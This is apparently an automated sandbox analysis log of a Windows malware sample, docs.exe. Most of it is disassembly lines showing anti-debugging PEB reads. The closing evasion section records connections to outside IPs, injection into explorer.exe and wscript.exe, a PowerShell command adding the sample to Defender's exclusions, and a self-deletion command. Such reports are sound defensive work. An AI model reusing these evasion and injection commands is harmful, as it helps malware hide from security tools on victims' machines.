          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010060B8 mov ecx, dword ptr fs:[00000030h]5_2_010060B8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov ecx, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD4144 mov eax, dword ptr fs:[00000030h]5_2_00FD4144
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F70124 mov eax, dword ptr fs:[00000030h]5_2_00F70124
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov ecx, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA118 mov eax, dword ptr fs:[00000030h]5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov eax, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE10E mov ecx, dword ptr fs:[00000030h]5_2_00FEE10E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F502E1 mov eax, dword ptr fs:[00000030h]5_2_00F502E1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov ecx, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01018324 mov eax, dword ptr fs:[00000030h]5_2_01018324
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A2C3 mov eax, dword ptr fs:[00000030h]5_2_00F4A2C3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101634F mov eax, dword ptr fs:[00000030h]5_2_0101634F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100A352 mov eax, dword ptr fs:[00000030h]5_2_0100A352
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov ecx, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD62A0 mov eax, dword ptr fs:[00000030h]5_2_00FD62A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E284 mov eax, dword ptr fs:[00000030h]5_2_00F7E284
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E284 mov eax, dword ptr fs:[00000030h]5_2_00F7E284
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0283 mov eax, dword ptr fs:[00000030h]5_2_00FC0283
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF0274 mov eax, dword ptr fs:[00000030h]5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44260 mov eax, dword ptr fs:[00000030h]5_2_00F44260
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3826B mov eax, dword ptr fs:[00000030h]5_2_00F3826B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3A250 mov eax, dword ptr fs:[00000030h]5_2_00F3A250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46259 mov eax, dword ptr fs:[00000030h]5_2_00F46259
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA250 mov eax, dword ptr fs:[00000030h]5_2_00FFA250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA250 mov eax, dword ptr fs:[00000030h]5_2_00FFA250
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC8243 mov eax, dword ptr fs:[00000030h]5_2_00FC8243
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC8243 mov ecx, dword ptr fs:[00000030h]5_2_00FC8243
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3823B mov eax, dword ptr fs:[00000030h]5_2_00F3823B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F5E3F0 mov eax, dword ptr fs:[00000030h]5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F763FF mov eax, dword ptr fs:[00000030h]5_2_00F763FF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F503E9 mov eax, dword ptr fs:[00000030h]5_2_00F503E9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov ecx, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEE3DB mov eax, dword ptr fs:[00000030h]5_2_00FEE3DB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE43D4 mov eax, dword ptr fs:[00000030h]5_2_00FE43D4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE43D4 mov eax, dword ptr fs:[00000030h]5_2_00FE43D4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFC3CD mov eax, dword ptr fs:[00000030h]5_2_00FFC3CD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A3C0 mov eax, dword ptr fs:[00000030h]5_2_00F4A3C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F483C0 mov eax, dword ptr fs:[00000030h]5_2_00F483C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC63C0 mov eax, dword ptr fs:[00000030h]5_2_00FC63C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0101625D mov eax, dword ptr fs:[00000030h]5_2_0101625D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38397 mov eax, dword ptr fs:[00000030h]5_2_00F38397
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6438F mov eax, dword ptr fs:[00000030h]5_2_00F6438F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6438F mov eax, dword ptr fs:[00000030h]5_2_00F6438F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E388 mov eax, dword ptr fs:[00000030h]5_2_00F3E388
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE437C mov eax, dword ptr fs:[00000030h]5_2_00FE437C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov ecx, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC035C mov eax, dword ptr fs:[00000030h]5_2_00FC035C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE8350 mov ecx, dword ptr fs:[00000030h]5_2_00FE8350
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC2349 mov eax, dword ptr fs:[00000030h]5_2_00FC2349
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010162D6 mov eax, dword ptr fs:[00000030h]5_2_010162D6
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C310 mov ecx, dword ptr fs:[00000030h]5_2_00F3C310
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F60310 mov ecx, dword ptr fs:[00000030h]5_2_00F60310
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A30B mov eax, dword ptr fs:[00000030h]5_2_00F7A30B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014500 mov eax, dword ptr fs:[00000030h]5_2_01014500
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F404E5 mov ecx, dword ptr fs:[00000030h]5_2_00F404E5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F744B0 mov ecx, dword ptr fs:[00000030h]5_2_00F744B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCA4B0 mov eax, dword ptr fs:[00000030h]5_2_00FCA4B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F464AB mov eax, dword ptr fs:[00000030h]5_2_00F464AB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA49A mov eax, dword ptr fs:[00000030h]5_2_00FFA49A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6A470 mov eax, dword ptr fs:[00000030h]5_2_00F6A470
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC460 mov ecx, dword ptr fs:[00000030h]5_2_00FCC460
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FFA456 mov eax, dword ptr fs:[00000030h]5_2_00FFA456
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6245A mov eax, dword ptr fs:[00000030h]5_2_00F6245A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3645D mov eax, dword ptr fs:[00000030h]5_2_00F3645D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E443 mov eax, dword ptr fs:[00000030h]5_2_00F7E443
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A430 mov eax, dword ptr fs:[00000030h]5_2_00F7A430
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3E420 mov eax, dword ptr fs:[00000030h]5_2_00F3E420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3C427 mov eax, dword ptr fs:[00000030h]5_2_00F3C427
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC6420 mov eax, dword ptr fs:[00000030h]5_2_00FC6420
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78402 mov eax, dword ptr fs:[00000030h]5_2_00F78402
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]5_2_00F6E5E7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F425E0 mov eax, dword ptr fs:[00000030h]5_2_00F425E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C5ED mov eax, dword ptr fs:[00000030h]5_2_00F7C5ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C5ED mov eax, dword ptr fs:[00000030h]5_2_00F7C5ED
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F465D0 mov eax, dword ptr fs:[00000030h]5_2_00F465D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]5_2_00F7A5D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]5_2_00F7A5D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E5CF mov eax, dword ptr fs:[00000030h]5_2_00F7E5CF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E5CF mov eax, dword ptr fs:[00000030h]5_2_00F7E5CF
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F645B1 mov eax, dword ptr fs:[00000030h]5_2_00F645B1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F645B1 mov eax, dword ptr fs:[00000030h]5_2_00F645B1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC05A7 mov eax, dword ptr fs:[00000030h]5_2_00FC05A7
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7E59C mov eax, dword ptr fs:[00000030h]5_2_00F7E59C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42582 mov eax, dword ptr fs:[00000030h]5_2_00F42582
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F42582 mov ecx, dword ptr fs:[00000030h]5_2_00F42582
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F74588 mov eax, dword ptr fs:[00000030h]5_2_00F74588
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7656A mov eax, dword ptr fs:[00000030h]5_2_00F7656A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7656A mov eax, dword ptr fs:[00000030h]5_2_00F7656A
          Source: C:\Windows\SysWOW64\wscript.exe; Code function: 8_2_005951D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc
          Source: C:\Users\user\Desktop\docs.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\docs.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe; Code function: 8_2_00597A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\docs.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 185.26.122.70 80
          Source: C:\Windows\explorer.exe; Network Connect: 188.114.96.3 80
          Source: C:\Users\user\Desktop\docs.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
          Source: C:\Users\user\Desktop\docs.exe; NtQueueApcThread: Indirect: 0xE5A4F2
          Source: C:\Users\user\Desktop\docs.exe; NtClose: Indirect: 0xE5A56C
          Source: C:\Users\user\Desktop\docs.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\docs.exe; Section loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\docs.exe; Thread register set: target process: 4004
          Source: C:\Windows\SysWOW64\wscript.exe; Thread register set: target process: 4004
          Source: C:\Users\user\Desktop\docs.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\docs.exe; Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 580000
          Source: C:\Users\user\Desktop\docs.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
          Source: C:\Users\user\Desktop\docs.exe; Process created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\docs.exe"
